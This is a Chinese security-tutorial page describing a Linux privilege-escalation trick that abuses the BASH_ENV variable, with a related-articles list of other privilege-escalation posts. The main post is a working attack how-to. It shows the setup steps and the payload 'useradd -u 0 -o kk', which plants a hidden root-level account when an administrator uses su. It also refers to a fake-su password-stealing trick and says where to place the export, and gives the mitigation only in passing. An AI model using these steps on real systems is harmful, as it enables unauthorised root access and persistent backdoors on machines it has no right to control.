linux提权用的一个技巧_安全教程

作者:xi4oyu
一个test:

[xiaoyu@localdomain ~]$ echo $BASH_ENV

[xiaoyu@localdomain ~]$ export BASH_ENV="/tmp/.bashrc"
[xiaoyu@localdomain ~]$ echo $BASH_ENV
/tmp/.bashrc

[xiaoyu@localdomain ~]$ cat /tmp/.bashrc
#!/bin/bash
echo "Hello"

[xiaoyu@localdomain ~]$ ls -l
-rwxrwxr-x 1 xiaoyu xiaoyu 22 2008-09-11 05:54 test.sh

[xiaoyu@localdomain ~]$ cat test.sh
#!/bin/bash
echo "kk"

[xiaoyu@localdomain ~]$ ./test.sh
Hello
kk

恩,很好,和我们预期的一样。看看我们怎么利用。

grep su ~/.bash_history

显示此用户有使用su登录root账户的特殊癖好。 以前我们遇到这种情况通常就是塞个fakesu.c进去。然后修改.bash_profile,建立个别名之类的东西。通过getpass来获得root 密码,记录,然后去除别名.....关键是管理员使用正确密码登录的时候也是会提示一次密码错误。遇到傻点的管理员可能就放过这个细节了,再输入一遍密码 就OK了。但是某些非人类admin会以最快的速度检查系统被入侵的迹象,外加啥啥啥,而且这种管理员改 root密码几乎是肯定的了。所以偷取下来的密码也没啥用处。恩,聪明的X客们一定知道我要做什么了。呵呵,先看看环境变量su后在不

[xiaoyu@localdomain ~]$ echo $BASH_ENV
/tmp/.bashrc
[xiaoyu@localdomain ~]$ su
Password:
[root@localdomain xiaoyu]# echo $BASH_ENV
/tmp/.bashrc
啊哦,还在,OK,实验结束,实战:

[xiaoyu@localdomain tmp]$ echo '/usr/sbin/useradd -u 0 -o kk 2> /dev/null' > /tmp/.bashrc
[xiaoyu@localdomain tmp]$ cat /tmp/.bashrc
/usr/sbin/useradd -u 0 -o kk 2> /dev/null
[xiaoyu@localdomain tmp]$ grep kk /etc/passwd
[xiaoyu@localdomain tmp]$ echo $BASH_ENV
/tmp/.bashrc
[xiaoyu@localdomain tmp]$ su
Password:
[root@localdomain tmp]# cd /home/xiaoyu
[root@localdomain xiaoyu]# ./test.sh
kk
[root@localdomain xiaoyu]# grep kk /etc/passwd
kk:x:0:503::/home/kk:/bin/bash
[root@localdomain xiaoyu]#

呵呵,改密码的语句我没加进去哦。自己想,呵呵,偶不知道,偶不知道

恩,关于怎么安置,和fakesu一样,在.bash_profile等地方export BASH_ENV变量...

如果要避免这种情况,使用su -登录root,估计没几个管理员记得这个指令吧..汗...

以后会慢慢放出一些小技巧,很多东西窝着窝着,自己都忘了...囧!

时间: 2024-10-29 22:08:02

linux提权用的一个技巧_安全教程的相关文章

提权,以MySQL之名_安全教程

作者kEvin  注:稿件已刊登于<黑客防线>2005年第7期上,转载请著明版权与出处.  前不久网上公开了一个MySQL Func的漏洞,讲的是使用MySQL创建一个自定义的函数,然后通过这个函数来攻击服务器.最早看到相关的报道是在o-otik上,但是公布的是针对Unix系统的Exploit,并且成功率也不是很高.而近期,国内有高手放出针对Win系统的相关文章,于是我马上找来与朋友一同研究.  其实我们早就能想到.当我们在对MSSQL\Oracle数据库进行攻击的时候,得到了最数据库中高权限

Linux提权:从入门到放弃

日站就要日个彻底.往往我们能拿下服务器的web服务,却被更新地比西方记者还快的管理员把内网渗透的种子扼杀在提权的萌芽里面.Linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置.一下是我总结的一些提权方法. 几点前提 已经拿到低权shell 被入侵的机器上面有nc,python,perl等linux非常常见的工具 有权限上传文件和下载文件 内核漏洞提权 提到脏牛,运维流下两行眼泪,我们留下两行鼻血.内核漏洞是我们几乎最先想到的提权方法.通杀的内核漏洞是十分少见的,因而我们应该先对系统相关

Linux提权?这四个脚本可以帮助你

简介 当你攻击一台计算机时可能会遇到一些拒绝执行操作的限制,就算你有一个shell也可能会遇到此问题.为了获得目标主机的完全控制权限,你需要在未被用户授权的地方绕过权限控制.你可以使用这些权限删除文件,浏览保密信息,或者安装病毒等用户讨厌的软件. Metasploit中拥有各种奇淫巧计,让你能远程系统下尝试获取受害者电脑的系统级权限.除此之外,当你在目标机器上尝试提升权限时还有一些Linux脚本可供使用,通常它们针对的是枚举系统信息而不是给出特定的漏洞或者利用.使用这些类型的脚本将会为你节省很多

红帽子Red Hat Linux 9光盘启动安装过程图解_安装教程

一,准备工作    1,购买或下载Redhat9的安装光盘(3张盘)或镜像文件,下载地址: 点击下面链接从本地下载光盘1:ftp://cjm123.vicp.net/Linux/红帽子Red%20Hat%20Linux%209.0正式版/shrike-i386-disc1.iso光盘2:ftp://cjm123.vicp.net/Linux/红帽子Red%20Hat%20Linux%209.0正式版/shrike-i386-disc2.iso光盘3:ftp://cjm123.vicp.net/L

小谈RADMIN的几个小技巧_安全教程

转载请保留版权信息!谢谢合作! by NetPatch welcome www.nspcn.org and www.icehack.com 最近做渗透测试时常碰到RADMIN一类的东西.. 一碰到此类的程序,一般我都会先看下对方把RADMIN的端口配置成什么..以及相应的PASS(加密过的) HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter //默认密码注册表位置 HKEY_LOCAL_MACHINE\SYSTEM

expression&amp;amp;eval跨站的一个方法_安全教程

expression这个CSS的属性很多程序都没有过滤好,很容易被跨,不知道用就参考剑心的幻影论坛跨站脚本漏洞测试过程. 我这里要说的是另外一种方法,使用String.fromCharCode方法把ASCⅡ码转换为字符再用EVAL函数执行. <img src="#" style="Xss:expression(eval( String.fromCharCode(100,111,99,117,109,101,110,116,46,98,103,67,111,108,111

linux入侵提权(服务器提权)方法

  利用mysql root提权方法 mysql 5.x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的 范围内. 一般我们按照常规思路,搞到mysql的root密码之后,我们都会连接上去,创建一个表,然后outfile,搞到一个webshell ,然后提权如斯这般.今天我们换一种方式. 按照上面的方法,我们需要知道web的绝对路径,当然这个很不好找,有些有sqlinjection的,可能报错会显示出来,有

Linux中普通用户提权至ROOT脚本

#!/bin/sh unset LD_AUDIT rm -r -f /tmp/exploit mkdir /tmp/exploit ln /bin/ping /tmp/exploit/target exec 3< /tmp/exploit/target ls -l /proc/$$/fd/3 rm -rf /tmp/exploit ls -l /proc/$$/fd/3 cat > program.c << _EOF void __attribute__((constructor)

服务器的权限设置技巧_服务器

转载请注明出自落伍im286.com,本贴地址:http://www.im286.com/viewthread.php?tid=1815922 硬盘权限篇 系统服务篇 组件安全设置篇 IIS用户设置篇 服务器安全和性能配置 IP安全策略 本地安全策略  1.服务器安全设置之--硬盘权限篇  这里着重谈需要的权限,也就是最终文件夹或硬盘需要的权限,可以防御各种木马入侵,提权攻击,跨站攻击等.本实例经过多次试验,安全性能很好,服务器基本没有被木马威胁的担忧了.  硬盘或文件夹: C:\ D:\ E: